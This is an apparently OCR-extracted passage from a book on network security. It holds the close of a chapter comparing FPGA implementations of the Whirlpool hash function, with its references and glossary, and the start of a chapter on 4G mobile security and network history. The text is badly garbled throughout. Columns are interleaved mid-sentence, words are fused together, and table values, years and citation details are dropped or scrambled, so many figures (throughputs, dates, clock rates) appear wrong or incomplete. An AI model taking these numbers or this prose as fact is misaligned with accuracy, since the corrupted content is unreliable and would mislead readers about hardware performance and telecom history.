tion uses a 10x512-bit RAM in order to store the throughput of this implementation is 4790 Mbps
necessary round keys. This RAM is mapped to at 144 MHz. An 68 BRAM is also used.
the 5K bits distributed RAM, and furthermore, In Pramstaller et al. (2006) a very compact
none of the proposed implementations use block Whirlpool hash hardware implementation is dis-
RAM (BRAM). cussed. This design has different philosophy than
The 1st implementation requires 10 clock cycles the implementations in this chapter and uses an
for each block. So, the BB implementation through- innovative state representation that makes it pos-
put is 12 Gbps at 236 MHz clock frequency, and sible to reduce the required hardware resources

remarkably. The complete implementation into tions in McLoone et al., to the FPGA character-
XC2VP40 VIRTEX FPGA requires 1456 CLB- istics (due to the high throughput per slice ratio).
slices and no BRAMs. It achieves a throughput The design in Pramstaller et al. (2006) achieves a
equal to 382 Mbps at a clock frequency equal to throughput equal to 382 Mbps at 131 MHz slower
131 MHz. by a factor range from 18 to 45 compared with the
As Table 1 shows that the author’s proposed implementations in this chapter. Although, as I
hardware implementations of the Whirlpool have already mentioned, this design has different
hash function clearly outperforms all the others philosophy and requires only a small amount of
implementations. The proposed implementations hardware resources.
are faster by a factor range from 1.5 to 45 times. Besides, comparisons with some other hash
Especially comparing with implementations in families’ implementations (Ahmad & Shoba Das,
McLoone et al. (2005) some important results can 2005; Deepakumara et al., 2001; Dominikus, 2002;
be extracted. Firstly, the two implementations in Grembowski et al. 2002; McLoone & McCanny,
McLoone et al., use the same FPGA device with 2002; Sklavos & Koufopavlou, 2003, 2005; Yiak-
the proposed implementations reported in this oumis et al., 2005) (the faster implementations of
chapter. So, any comparisons are absolutely fair other hash families’ are collected) are given in Table
and accurate. Secondly, by using FPGA-LUTs 2 in order to have a fair and detailed comparison
much better results are achieved in both time with the proposed implementations.
performance and area requirements. Finally, about From Table 2, it is obvious that the Whirlpool
the ratio throughput per slice, that measures the implementation performs much better in terms of
hardware resource cost associated with the imple- throughput, comparing to all the previous hash fam-
mentation resulting throughput and it is proven ilies published implementations (Ahmad & Shoba
that the proposed implementations in this chapter Das, 2005; Deepakumara et al., 2001; Dominikus,
philosophy matches better than the implementa- 2002; Grembowski et al., 2002; McLoone & Mc-
Table 2. Comparisons with other hash families’ implementations
Implementation fPgA device slices frequency (MHz) throughput (Mbps)

Md5 (dominikus, 2002) XV00E 00 .
Md5 (deepakumara et
XV000FG0 .
al., 2001)
sHA-1 (yiakoumis et al.,
Virtex-II 0.
2005)
sHA-2 (512) (sklavos &
XCV00 0
koufopavlou, 2003)
sHA-2 (512)
(grembowski et al., XCV000 . 0
2002)
sHA-2 (512) (Mcloone &
XCVLX00 + BRAM ~
Mccranny, 2002)
sHA-2 (512) (Ahmad &
STRATIX EPS0FC LEs .
shoba das, 2005)
rIPEMd-128 (sklavos &
V0FG 00
koufopavlou, 2005)
rIPEMd-160 (sklavos &
V0FG 0 00
koufopavlou, 2005)
Author 1st_impl_bb XCVLX00 0 0
Author 1st_impl_lb XCVLX00
Author 2nd_impl _bb XCVLX00 00
Author 2nd_impl _lb XCVLX00 0

Cranny, 2002; Sklavos & Koufopavlou, 2003, 2005; rEfErEncEs

Yiakoumis et al., 2005) . The implementation in
McLoone and McCranny (2002) uses the same Adams, C., & Farrell, S. (1999, March). Internet
FPGA device as the proposed implementations X.095 PKI—Certificate management protocols
in this chapter. It also, requires more hardware (RFC)0 1 5 2 . Retrieved March 1999, from, http://
resources compared with the other hash families’ www.ietf.org/rfc/rfc2510.txt
implementations. This is a logical result of the
algorithm philosophy and not an implementation Ahmad, I., & Shoba Das, A. (2005). Hardware
trade-off. Finally the Whirlpool has the smaller implementation analysis of SHA-256 and SHA-512
algorithm execution latency. It needs only 10 clock algorithms on FPGAs. Computers and Electrical
cycles in order to transform each block compared Engineering, 31, 345-360.
with the 64 clock cycles of the MD5, and SHA-2 Barreto, P. S. L. M., & Rijmen, V. (2003, May).
(256), and 80 clock cycles of the RIPEMD-160, The whirlpool hashing function (Rev. ed.). Paper
SHA-1, and SHA-2 (384, 512). This is an important presented at the NESSIE.
advantage of the hardware implementation.
Deepakumara, J., Heys, H. M., & Venkatesam,
R. (2001). FPGA Implementation of MD5 hash
conclusIon algorithm. In IEEE Canadian Conference on
Electrical and Computer Engineering (CCECE
The Whirlpool hash function is the most recent 2001) (Vol. 2, pp. 919-924).
hash function to be standardized. It was selected Dobbertin, H. (1997). RIPEMD with two-round
to be included in the NESSIE portfolio of crypto- compress function is not collision free. Journal
graphic primitives. An efficient architecture of Cryptology,and
10, 51-69.
VLSI implementations for this hash function are
presented in this chapter. Two architectures for W Dobbertin, H., Bosselaers, A., & Preneel, B. (1996).
blockcipherareintroduced.Thefirst RIPEMD-160,
- one isapproa strengthened version of RIPEMD.
priate for high speed applications since the round InFast SoftwareEncryption(FSE’9 )6
(LNCS 1039,
keysareproducedontheyfl whilethesecondone pp. 71-82). Springer-Verlag.
is appropriate for area restricted devices. Parts of Dominikus, S. (2002). A hardware implementation
the proposed implementations were designed by of MD4-Family algorithms. In IEEE International
using two alternative techniques. The 4-bit mini Conference on Electronics Circuits and Systems
boxes (E, E-1, and R) were designed by using LUTs (ICECS 2002) (pp. 15-18).
and Boolean expressions. So, four implementations
havebeenintroducedandeachspecificapplication Grembowski, T., Lien, R., Gaj, K., Nguyen, N.,
can choose the appropriate speed-area, trade-off Bellows, P., Flidr, J., et al. (2002). Comparative
implementation. The achieved throughput for the analysis of the hardware implementations of hash
proposed implementations ranges from 7 Gbps functions SHA-1 and SHA-512. In Fifth Interna-
to 17.2 Gbps. These hardware architectures and tional Conference on Information Security (LNCS
implementations are significantly 2433, faster than
pp. 75-89). Springer-Verlag.
any other previous reported implementations of International Organization for Standardization
the algorithm and they are also up to 16.5 times (ISO). (2004). ISO/IEC 10118-3: Information tech-
faster than hardware implementations of other nology—Security techniques—Hash functions—
hash functions. Part 3: Dedicated hash-functions. Retrieved 2003,
from http://www.iso.org/iso/en/CatalogueDetail-
Page.CatalogueDetail?CSNUMBER=3.6 789

Kitsos, P., & Koufopavlou, O. .)024( Efficient 384, 512) hash functions. In IEEE International
architecture and hardware implementation of the Symposium on Circuits and Systems (ISCAS 2003)
whirlpool hash function. IEEE Transactions on (Vol. V, pp. 153-156).
ConsumerElectronics, (1), 208-213. 05
Sklavos, N., & Koufopavlou, O. (2005). On the
McLoone,M.McCanny,
&, J.V.Efficient
. ) 02 ( hardware implementation of RIPEMD processor:
single-chip implementation of SHA-384 & SHA- Networking high speed hashing, up to 2 Gbps. Com-
512. In IEEE International Conference on Field- puters and Electrical Engineering, 31, 361-379.
Programmable Technology (FPT) (pp. 311-314).
Wang, X., Yin, Y. L., & Yu, H. (2005). Finding col-
McLoone, M., McIvor, C., & Savage, A. (2005). lisions in the full SHA-1. In Advances in cryptology,
High-speed hardware architectures of the whirlpool th
5 2 AnnualInternationalCryptologyConference
hash function. In IEEE International Conference (LNCS 3621, Santa Barbara, CA pp. 17-36).
on Field-Programmable Technology (FPT) (pp.
Xilinx Incorporated. (2006). Silicon solutions—
13-18).
VirtexseriesFPGAs. Retrieved October 10, 2006,
Menezes, A. J., Van Oorschot, P. C., & Vastone, from http://www.xilinx.com/products/
S. A. (1997). Handbook of applied cryptography.
Yiakoumis, I., Papadonikolakis, M., Michail, H.,
CRC Press.
Kakarountas, A. P., & Goutis, C. E. (2005). Ef-
National Institute of Standards and Technology ficient small-sized implementation of the keyed-
(NIST). (1995, April 17). SHA-1 standard, secure hash message authentication code. In IEEE502
hash standard (FIPS PUB 180-1). Retrieved April International Conference on “Computer as a tool”
17, 1995, from http://www.itl.nist.gov/fipspubs/ (EUROCON) (pp. 1875-1878).
fip1ht
. 1 08 - m
National Institute of Standards and Technology
(NIST). (2002, August 1). SHA-2 standard, secure kEy tErMs
hash standard (FIPS PUB 180-2). Retrieved August
1, 2002, from http:csrc.
/ nist.gov/publications/ fips/
Cryptography: In modern times, cryptography
fips1fips1
/2 0 8 - pd
2. 0 8 - f has become a branch of information theory, as the
mathematical study of information and especially
its transmission from place to place. Cryptography
(NIST). (2005, December). SP800-77, Guide to
is central to the techniques used in computer and
IPSec VPN’s. Retrieved December 2005, from
network security for such things as access control
http://csrc.nist.gov/publications/nistpubs/800-77/
andinformationconfidentiality.
sp800-77.pdf
DSP48 Slice: DSP48 slice is the basic building
New European scheme for signatures, integrity,
block of XILINX VIRTEX-4 FPGAs.
and encryption (NESSIE). (2004). Retrieved March
2004, from https://www.cosic.esat.kuleuven. Field-Programmable Gate Array (FPGA)
ac.be/nessie Device: FPGA device is a semiconductor device
used to process digital information, similar to a
Pramstaller, N., Rechberger, C., & Rijmen, V.
microprocessor. It uses gate array technology that
(2006). A compact FPGA implementation of the
can be reprogrammed after it is manufactured,
hash function whirlpool. In 14th ACM/SIGDA In-
ratherthanhavingitsprogrammingfixedduringthe
ternational Symposium on Field-Programmable
manufacturing—a programmable logic device.
Gate Arrays - FPGA (pp. 159-166). ACM Press.
Sklavos, N., & Koufopavlou, O. (2003). On the
hardware implementation of the SHA-2 (256,

Hardware Implementation: Hardware imple- New European Schemes for Signatures,

mentation is the building of the blocks of digital Integrity, and Encryption (NESSIE): NESSIE
chip (either ASIC or FPGA) design and it relates was a European project that was responsible to
them to the hardware description languages that introduce new cryptographic primitives with high
are used in their creation. security levels.
Hash Function: Hash function is a function Whirlpool Hash Function: Whirlpool hash
thatmapsaninputofarbitrarylength intois
function afixed
the most recent hash function to be
number of output bits, the hash value. standardized. It was selected to be included in the
NESSIE project of cryptographic primitives.
0
Section II
Security in 3G/B3G/4G

Chapter XVIII
Security in 4G
Artur Hecker
Ecole Nationale Supérieure des Télécommunications (ENST), France
Mohamad Badra
NationalCenterforScientificResearch,France
AbstrAct
The fourth generation (4G) of mobile networks will be a technology-opportunistic and user-centric
system combining the economic and technological advantages of different transmission technologies to
provide a context-aware and adaptive service access anywhere and at any time. Security turns out to be
one of the major problems that arise at different interfaces when trying to realize such a heterogeneous
system by integrating the existing wireless and mobile systems. Indeed, current wireless systems use
verydifferentanddifficulttocombineproprietarysecuritymechanisms,typically - relyin
ated user and infrastructure management means. It is generally impossible to apply a security policy
toasystemconsistingofdifferentheterogeneoussubsystems.Inthischapter,wefirstbr
security of candidate 4G access systems, such as 2/3G, wireless LAN (WLAN), WiMax, and so forth. In
thenextstep,wediscussthearisingsecurityissuesofthesysteminterconnection.We
logical access problem in heterogeneous systems and show that both the technology-bound, low-layer
and the overlaid high-layer access architectures exhibit clear shortcomings. We present and discuss
several proposed approaches aimed at achieving an adaptive, scalable, rapid, easy-to-manage, and
secure4Gserviceaccessindependentlyoftheusedoperatorandinfrastructure.Wethe
requirements on candidate systems to support such 4G security.
Security in 4G
gEnErAtIons of PublIc lAnd operational in 1984. In 1988, an extension providing

MobIlE nEtworks additional frequency bands was added (E-AMPS).
AMPS networks are found in the Americas, Aus-
from 1g to 2g tralia, and in Asia.
TACSisamodificationofAMPSaimingatthe
Thefirstgeneration of mobile networks
public land British market, where the standard was operational
(PLMN) is characterized by the fact that both in 1985. TACS also received a wider frequency
control channels and traffic channels band
arein 1988,
analog. E-TACS. Since that time, TACS has
Voice (commonly at 3 kHz) and data (if any) are spread to many countries around the world.
frequency-modulated on a carrier. Today, these In 1982, at the time of the commercialization of
networks are usually summarized under the com- the first G
1 networks, theGroupeSpécialMobile
monnamefirstgenerationG)1 ( althoughthere was formed
areat CEPT (Conférence européenne des
different analog network standards like Nordic Administrations des Postes et des Tèlécommunica-
mobile telephony (NMT), American mobile phone tions, the creator and standard-body predecessor of
system AMPS), and total access communication today’s European Telecommunications Standard
system (TACS). Institute, ETSI), with the task of developing a Eu-
NMT was the first commercially operated rope-wide standard for cellular communication. In
PLMN (1981). NMT uses two different frequency other words, the scope here was to provide the same
bands about 450 and about 900 MHz (NMT 450 service (voice) by a new, universal system.
and NMT 900). NMT900 was introduced in 1986 In 1987 the CEPT working group decided to
as a result of the fact that the number of channels build a digital, narrowband time division multiple
inNMTwas 05 4 insufficient.NMThas 90 been access (TDMA) system. In 1990, ETSI published
implemented in Europe, the Middle East, and Phase IoftheGSMsystemspecifications.Three
Asia. frequency bands have been defined global for
system for mobile communications (GSM) us-
AMPS was specified by the U.S. consortium
TIA/EIA/ANSI.ThefirstAMPSnetworkbecame age: 900MHz, 1800 MHz, and 1900 MHz. The
corresponding standards are similar, aiming at
Table 1. Ten years cycles in the mobile networks (from a European view)
Year Milestone Cycles
198 Commercial deployment of NMT: 1G start
1982 CreationofGroupeSpécialMobileatCEPT
1G to 2G: 10 years
1984 Commercial deployment of AMPS networks in the US

1986 Big number of users leads to NMT extensions
1988 Big number of users leads to AMPS extensions
1989 European Union RACE Project “invents” UMTS
World Administrative Radio Conference (today: WRC) allocates 230
3G conception: 10 years
1992 MHz to Future Public Land Mobile Telecommunication System

(FPLMTS).
192 Commercial deployment of GSM: 2G start
1994 Second wave of UMTS research projects
2G to 3G: 10 years
1995 RACE vision of UMTS

1996 Creation of UMTS task force
196 Digital overcomes analog
1997 Establishment of the UMTS Forum
1999 UMTS decision
2000 WRC designates IMT-2000 extension bands
2002 Commercial deployment of UMTS: 3G start

Security in 4G
wide-range (GSM 900) and dense-area (GSM Table 1 summarizes the history of the PLMN
)90 18/ deployments respectively. The first development from the European point of view as
commercial GSM services were launched in the presented in Pereira (2000). In particular, it illus-
middle of 1991, thus marking the start of the second trates the repeating approximate 10-year cycles
generation (2G) era. both in the conception phases and in the genera-
GSM was the first completely digitaltion PLMN.lifetimes.
It is thus naturally a revolutionary approach, as
comparedtoitsanalogpredecessors.GSM the defines
third generation of PlMn
a series of improvements and innovations com-
pared to previous cellular networks; aiming for The 3G of mobiles was expected to be the future
anefficientuseoftheavailablespectrum; global secure
standard for the integrated voice and data
transmissions; an improvement in voice quality; communications. 3G was designed in the last de-
a reduction in the cost of handsets (using very cade of the 20th century with the goal to provide
large-scale integration [VLSI]); infrastructure and enhanced wide-range voice and data services. But
management; an ability to support new services; it turns out that it changes little in the actual user
and a full compatibility with Integrated Services experience.
Digital Network (ISDN) and with other data trans- Technically, 3G design mainly aimed at the im-
mission networks. Another basic characteristic of provement of the radio link performance in the 2G
the system is called international roaming, that is, scope. Although the developed standard features
the possibility for the mobile user to access GSM drastically improved data rates as compared to
service even when he/she finds himself/ 2G,herself
from the point of view of the data services the
physically outside the coverage area for which practically offered data rates can be still considered
he/she is subscribed, registering as a “visitor.” scarce. This can be observed in a direct compari-
Provided that the necessary business contracts son to the development of the wired technologies
exist, the roaming is completely automatic. In ad- providing home Internet access. From 1994 until
dition to roaming, GSM offers new user services, 2004, the phone-line Internet access technologies
including data transmission, fax service, and short have evolved from V.34 modems (28.8 kbps) over
message service (SMS). V.90 (56 kbps) to cable (1-2 Mbps shared) and ADSL
Thus, in Europe one completely new standard (originally 500 kbps, 2004 up to 10 Mbps). This
has replaced different existing ones. Almost the means an almost 350-fold increase in 10 years. In
contrary happened in the U.S.: the quasi unique the same period, the data rate of the wireless cel-
AMPS has been replaced by a variety of (at least lular access has not been able to keep up the pace.
partially) incompatible, (partially) digital systems: From the original GSM CSD service introduced in
N-AMPS, D-AMPS (IS-54, IS-136), PCS (IS-95), 1994 and providing 9.6 kbps, the cellular systems
GSM 1900, Omnipoint, and PACS. evolved over General Packet Radio Service (GPRS)
The variety of incompatible networks and the (about 64 kbps in practice) to EDGE/cdma2000
increasing popularity of data services have moti- RTT-1X (typically about 100-130 kbps). The 3G
vatedandmuchinfluencedtheworkonthe (e.g.,third
UMTS) provides about 300 kbps in practice.
generation (3G) of mobiles. In 1992, at the same time This corresponds to a 30-50 fold increase in the
asthecommercialdeploymentoffirstG2 networks same decade. Moreover, the provided data rates
started, the International Telecommunications highly depend on the network operator’s overall
Union (ITU) allocated frequency ranges for the capacity, the number of users in the cell and the
next generation of PLMN (then called FPLMTS) distance to the base station.
thus providing an international common base for However, the relatively limited data rate is not
theG.3 Finally, in 02 the first commercialG3 the only problem of the 3G data service. Because
networks were commercially deployed in Japan. of the vast, national-scope infrastructure, and
many intermediate nodes, the user experiences

Security in 4G
high network latency (e.g., from the point of view ms in order to provide a fair chance of winning
of IP, the whole 3G infrastructure is one link). and a good game experience.
GRPS and EDGE often exhibit network round Furthermore, by its design 3G targets telecom-
trip times (RTT) of 600 ms and more. UMTS munications providers. Like 2G, 3G uses a license
links are expected to be better, but they still have model to prevent random medium access by non-
RTT of about 200-250 ms. The wideband code authorized parties. Since the licenses are expensive
division multiple access (W-CDMA)/high speed (Van Damme, 2002), in reality this implies a major
downlinkpacketaccess(HSDPA)service,defined telecom operator with a mammoth infrastructure
inthefifthrelease,isexpectedtohave morethan
behind everyG3 RAN.Tofulfilltherequirements
100 ms RTT, that is, almost an Internet-level RTT. of such an authority, the 3G RANs are designed
Such high network latencies are inappropriate for to be reliable and manageable and to support dif-
certain application classes: interactive applica- ferent qualities of service. This justifies the h
tions imply latency constraints that typically lie cost of the 3G equipment. At the same time, this
under the 300-400 ms overall RTT proposed by limits the competition on the market to few license
3G (the end system is not necessarily within the holders who not only have invested a lot in the
UMTS backbone and thus the typical Internet infrastructure but also have paid a high price for
RTT of about 100-200 ms has to be added to the the license. The operators have to amortize this
3G latency). For example, voice over IP (VoIP) fixedcostandthecurrentvariablemaintenancea
and similar applications (videoconferencing, management cost over the user services provided
etc.) require an RTT to be under 250 ms; in some by the infrastructure. Thus, 3G RAN access is
existing popular interactive online games (e.g., id likely to remain costly. It is unclear if attractive
Software’s Quake, etc.,) the maximal acceptable unlimitedat- fl linepricingmodels(likeinxDSL)
RTT to the game server is required to be under 100 are applicable to such infrastructures. Current per
Figure 1. 3G: Current and planned UMTS launches

Security in 4G
byte (or even per minute!) pricing seems hardly cated thoughts about beyond 3G (B3G) and 4G
suitable for the always-on paradigm. systems appeared in the international research
A consequent national-scope investment is press about 2000-2001 (Bria et al., 2001; Evans
needed for 3G advantages to materialize (both for & Baughan, 2000; Pereira, 2000; Raivio, 2001;
usersandforproviders)This . ishowever difficult
Varshney Jain,
& that
, ) 1 02 is,justbeforethefirst
to afford, especially in developing countries where commercial 3G networks were deployed in Japan.
big investments are particularly risky. In a focused In 2000, the WRC allocated 3G extension bands,
coverage, 3G comes at a very high cost per bit which were to be used in the B3G scope. All this
compared to other, more data-centric technologies corresponds to the 10-year cycles illustrated in
like local or metropolitan area networks. That is one Table 1.
ofthereasonswhytheG3 systemshadadifficult Continuing along this line, the concrete shapes
start. They are primarily being deployed in Japan, of4Gshouldbeclarifiedbytheendof027and
South Korea, Taiwan, Hong Kong, Indonesia, a few theactive4Gvisionrefinementshouldstartabou
countries of South America, Australia, New Zea- 0.28- 7 This should be finished roughly by
land, western Europe, and North America (CDMA 2010, with several detail issues being addressed in
Development Group, n.d.; GSM Association, n.d.). thefollowingyears.Thefirstcommercialsystems
Figure 1 (GSM Association, n.d.) summarizes the could then be operational by 2012. However, this
actual and planned commercial launches of the presumes that no additional delays occur.
3G system from the 2004 European point of view
(W-CDMA/UMTS). It shows that the developed Possible delays
countries prevail.
Although the slow 2G-3G transition process At least in Europe and in the U.S., the 3G deploy-
started in 2003-2004, so far the 3G systems do ment seems to be delayed. Indeed, by the end of
not seem suitable to provide a broadband data 2004, not all western European countries started
access service deployment. In the developed the 3G deployment. Also, the deployment process
world, these are often considered technologically is starting quite slowly, often being limited to some
inadequate (users perceive it as a better 2G). For few centers. The critics of 3G claim that the rea-
the developing world, the technology needs major sons for this could be in the developed technology
investments.Thus,anew,moreexible fl technology
itself. Indeed, one could argue that 3G (in Europe:
is necessary, allowing new usage scenarios and UMTS) is too complicated and too costly to become
business models. successful. One could also criticize the fact that
the original goal of creating one common global
the Anticipated 3g to 4g transition standard has not been achieved since different con-
current versions of 3G are being standardized and
In regards to 3G, the observed 10-year cycles seems deployed, in some extreme cases within the same
to continue. The first research concepts countryaiming
(e.g., Japan has deployed both cdma2000
at 3G appeared about 1989. The spectrum was and W-CDMA). However, the deployment of the
reserved by ITU-R’s World Radiocommunication alternative technologies (like e.g., 802.11 hotspots
Conference (ITU-R Radiocommunication Confer- or WiMax) also lags behind the expectations that
ence,that
, ) 29 1 is,atthesametimeasthefirst haveG2 predicted a WiFi-boom and hotspot number
networks were deployed. The active technological explosions by 2005, which so far have failed to
development of 3G started with the creation of the become true. There is no doubt about the popular-
UMTS task force in 1996 and culminated in the ity of WiFi. However it is not booming, it is being
UMTS decision in 1999. The largest parts of the carefully developed. The real reasons thus could
standards were accomplished by then. be either of a social (e.g., a simple current disinter-
Consequently,thefirstprojects fourth naming est in mobile data) or of an economic nature (too
generation4G)( startedinand 91 thefirst
- dediin deployment, too risky for operators; too
costly
costly, too complicated for users, etc.).

Security in 4G
We tend to think that economic barriers prevail. 4g: A tEcHnology-

Indeed, businesses have so far often expressed their oPPortunIstIc, usEr-cEntrIc
need for mobile communications development. systEM
This has been much discussed in different business
scopes: home- and telework, instant data access
4g Expectations
for mobile sales personnel, eet fl management,
reduction of infrastructural costs, globalization,
With the ongoing globalization, world-wide com-
and so forth. With the further development of the
munications become an essential service. The
Internet and the associated technologies, private
3G, meant to provide a global communications
users are also likely to be interested in services
standard, has mostly failed to do so. Instead, it
such as mobile e-commerce, online gaming, private
now uses different standards in different countries.
communications (e.g., voice or instant messaging),
Moreover, 3G remains a closed “big company”
various personal and business data exchanges,
telecommunications forum. That results in the
and so forth.
situation where users still need costlier multi-band,
The telecommunication crisis initiated by the
multi-technology handsets, yet they cannot access
complete op fl of the exaggerated initial Internet
the 3G services using other devices over newer
business activities (often referred to as the bursting
radio access networks (RANs). To provide users
of the Internet bubble) could have been one of the
with a world-wide service we need openexible fl
key economic factors responsible for the observed
standards, also suitable for the Internet and data
3G deployment delays. Indeed, the investments in
communications deployment in the developing
the IT and telecommunication sectors have since
countries.
radically switched from headlong promiscuity to
At the other end, personal communications are
skeptical cautiousness. From the European point
being rapidly developed using short range radios.
of view, the starting crisis was amplified by the
These need to be considered for the next generation
UMTS license auctions in 2000-2001 raising cu-
communications because their rapid development is
mulatively over 100 billion USD in the Western
a fact (Raychaudhuri, 2002). The existing personal
European countries (Van Damme, 2002).
area networks (PAN) and LAN technologies are
The paid spectrum prices washed away much
often used for device-to-device data transfers but
of the liquidity of the Western-European telecom-
can easily do more than that. Wireless headphones,
munications operators. Yet, this liquidity was
handsets, and PDAs can already build personal
necessary for the deployment of the network (in-
networks capable of data and voice transport. In
frastructure updates and add-ons). Since the UMTS
the home area or in vehicles (e.g., personal cars),
cannot substantially improve the GSM voice service
this can be extended to LAN-like communications.
as such, the only added value of the UMTS is in
The aim here is to give users access to their data
the improved data services. Hence, compared to
independently of the device currently in use. So,
classic GSM offerings, the paid auction price for
handsets can be asked to dial numbers stored in
the UMTS licenses must be amortized over time
the home PC and to direct the voice ow fl to the
over the new services, which UMTS is just about
wireless headphones. Wireless sensors are already
to propose. However, this could render these new
available, for example, for outdoor weather con-
services particular expensive.
dition measurements. Wireless sensors are used
more and more in cars. They are also expected to
be further developed for home users (intelligent
home). This underlines the increasing part of the
machine-to-machine (M2M) and network-to-
network (N2N) communications in the future
communications landscape.

Security in 4G
The obviously challenging scenario is to provide Big telcos will try to reduce their service cost by
users with a bidirectional communications possi- integrating alternative transmission technologies
bility to their personal Intranets independently of as radio access networks (RAN) into their 3G
their location (anywhere), thus combining the two infrastructure (e.g. UMA-like). However, this
topics discussed previously. These WAN/MAN/ integration will still be much more complicated
LAN/PAN spanning communication sessions have and costly than a new deployment possible for a
to be secure, reliable, and economically reasonable. small wireless internet service provider (WISP).
Also, communications become ubiquitous. The At the same time, the small WISPs will encounter
used technology needs to be able to reply to this increasing management problems with the grow-
challenge, providing the best available connection ing user basis and the user traffic. It will hardly
anytime, any place. Existing standards do not al- be reasonable to add a 3G infrastructure upon the
low for this usage. existing one as the control plane. Given the lack of
However, it is not a matter of contention between standardized methods, the alternative infrastruc-
these existing standards. They are more and more tures are thus likely to be managed in a proprietary
understood as complementary. Indeed, the WLANs way,requiringspecificaccessmethods.Thiswill
can easily provide a true LAN experience in limited produce the demand for standardization.
areas at a low cost while 3Gs RANs are designed Because of the true need for mobile broadband
to provide true mobility, quality of services and data access and the scarce spectrum of 2G, the 3G
vast coverage. The idea to try to integrate both will be eventually deployed in the business centers
technologies is thus straightforward. of the developed countries despite the currently
Taking into account the previously observed observed delays. In Europe, this process could be
cycles and the current delays, we could try to com- further promoted by governmental policy in some
pile a prognosis on the B3G and 4G development countries planning to partly reimburse some license
in the next decade. The current situation and our fees. However, the delays and the high license fee
forecast are illustrated in Table 2. (Van Damme, 2002) have already motivated the
The convergence between the different in- development of and the investments in the alterna-
frastructures will start because of the economic tive transmission technologies, for example, IEEE
and technological limits of the used technologies. 802.11 and IEEE 802.16.
Table
Table 2.
1. Possible 3Gdevelopment
Possible 3G developmentin in
thethe
nextnext years
years
Year Milestone Cycles
2003 European 3G start
Until
Different 4G visions and early 4G research projects
2005
2006 3G deployment in all business areas in the developed world
3G to 4G: 10 years
2006 Broad deployment of alternative technologies (from WiFi to WiMax, etc.)

Further deployment, different UMTS updates (HSDPA, HSUPA) and integration of
2007
alternative technologies in the UMTS infrastructure
Convergence of different 4G views implied by the economic and technological
2009
factors
The high popularity of data services shows 3G transport limits and WiMax/WiFi
2010
management limits (security, mobility, usability, etc.)
2011 Deployment of first B3G (3.5G) systems
2011 Establishment of a 4G forum
2012 Mature technical drafts of 4G systems integrating different technologies
2014 First commercial 4G services

Security in 4G
This development, if commercially success- (e.g., 4G forum) that will be given the task of 4G
ful, will lead to a situation with several parallel system standard development. Based on the situ-
infrastructures installed in the European centers ation and the previously accomplished research, it
by 2008-2009. While the 3G infrastructures will could produce mature system drafts by 2012 and
be homogeneous, they are likely to remain more the first commercial 4G deployments could start
expensive. The alternative offerings will be cheaper about 2014.
but are not likely to provide neither the same service
quality nor the same coverage. Because of the re- our 4g vision
quired spectrum licenses, the same national-scope
operators will own the 3G systems. The alternative Our vision is motivated by the previous work and
technologies are license-free and thus enable a free the ongoing development of the global telecommu-
network deployment. These can be owned by both nications networks, in particular of the Internet. It
global big telcos and small local WISPs. respects the fact of the proliferation of the Internet
Users will buy newer products equipped with technology in all telecommunications branches
further wireless technologies. Deploying these and is similar to the All-IP approach when used
products at home, users will be interested in access- for data transport.
ing the combined service offers. Different devices Learning from 2G and 3G experiences, 4G
will be capable of several access methods (e.g., a envisages an architecture that allows the maxi-
wireless ADSL router). Users will be incited to mum possible infrastructure reuse. The idea is to
open their hotspots for the usage by the others. For minimize a risky engagement with a particular
instance, a major French telecom provider proposes technologyandtoguaranteethelong- - termexibil
fl
a reimbursement plan for its ADSL users if they ity for the involved authorities. We believe that the
provide WLAN access to its cellular customers over versatilityherecanprovideanenhancedexibili fl
such devices. At the same time, alternative technol- both technologically and from the business point
ogy operators are forming roaming organizations of view. This ultimately market-driven solution
and user communities, aiming for the same results should be capable of providing any service in any
(see WeROAM, Fon communities, etc.) manner, restricted solely by user’s demand and not
Meanwhile, the research will push towards uni- by any technological factors.
fiedandconcreteB3Gand4Gviews.Toprotectthe
investments, the deployed alternative infrastruc- From Service-Centric to Data-Centric
tures are likely to be given the necessary attention Approaches, from Technology-Centric to
in this development process. The result will likely
User-Centric Approaches
be a system providing for a convergence between
the different technologies.
The classic telecommunications industry ap-
While the new 4G architecture is being con-
proach dominated by the national-scope telecom
ceived and is maturing technologically, 3.5G sys-
operators with the well-managed infrastructures
tems are likely to appear on the market by 2010 at
currently cannot provide a cost-effective focused
thelatest,fillingthegapbetweenLAN-experience
access to Internet services. This is particularly true
and manageable. These updates of the radio link
for the developing countries where neither new
and of the backbone infrastructure could provide
installations nor massive updates of the existing
the basis for the later expected 4G much in the
infrastructure can be afforded.
same manner as GPRS/EDGE (2.5G) have required
In its initial collaborative work, the telecom-
and accomplished the necessary infrastructural
munications industry was much influenced by
changes for the transition process from 2G to 3G.
the dominating demand for the voice telecom-
The commercial and technological convergence
munications. The 1G and 2G systems were origi-
and the available B3G systems will provide the
nally designed to provide one single service: the
drivers for the establishment of an industry group
mobile voice telephony. Their system design was

Security in 4G
service-oriented. As a result, the conceived core available service. Choice, as the driving factor for
infrastructure is circuit-oriented and the wireless the competition, plays a crucial role in this scope
link’s capacity is tailored to the voice-implied since it results in better and cheaper technology.
bandwidth requirements. Due to these properties, From the system’s point of view, the resulting
2G currently provides a reliable voice service; it is overall architecture delivers very different ser-
howeverquitedifficulttoreusethisvices infrastructure
through completely heterogeneous access
for other purposes. However, deploying a new networks (ANs). User-oriented design has to cope
infrastructure for every service is not scalable with the question how to manage the system and
and financially impossible. Especiallyhow with the user services with an expected
to provide
modern digital technologies, it is much more quality. The management is important because a
efficient to reuse the same infrastructure - for difreduces the operational costs.
good management
ferent services. The provision of the expected quality is the main
3G development is an example of a network- factor for the user satisfaction.
oriented design process (sometimes also called Such architecture could help to achieve more
operator-oriented design). It is a step ahead from infrastructuralandarchitectural - exibility
fl p
the service-oriented design of the 2G system since ing a free technology choice for the local operators
it explicitly provides for infrastructure reuse for andthus,inthefinalrun,reducingthecostsand
various services. Principally aiming at opera- offering more choices for the users. By featuring
tors and networks, such design tries to respond more exibility,
fl this step to further - diversifica
to operator’s management requirements. It thus tion gives new opportunities and could help, for
specifies parts of the network core, producing example, to reduce the cost or to mitigate some
homogeneous technologies comprising everything aspects of the digital divide problem.
the operator has requested. According to this design At the same time, this task is not technologi-
paradigm, the 3G technologies deliver voice and cally simple. As could be seen from the previous
data within the same infrastructure. In presence examples, the service-oriented design approach is
of an existing voice-oriented 2G infrastructure a straightforward technological way to conceive a
this renders the only added service—the mobile network dedicated to the needs of one single ser-
broadband data—quite expensive in itself. The vice. Provision of more services within the same
operators have to amortize the network deployment infrastructure makes it more difficult to assu
and the license cost over the new service. Thus, that every service individually is provided in a
from the user’s point of view, this new service is satisfactory way. We can generally allege that the
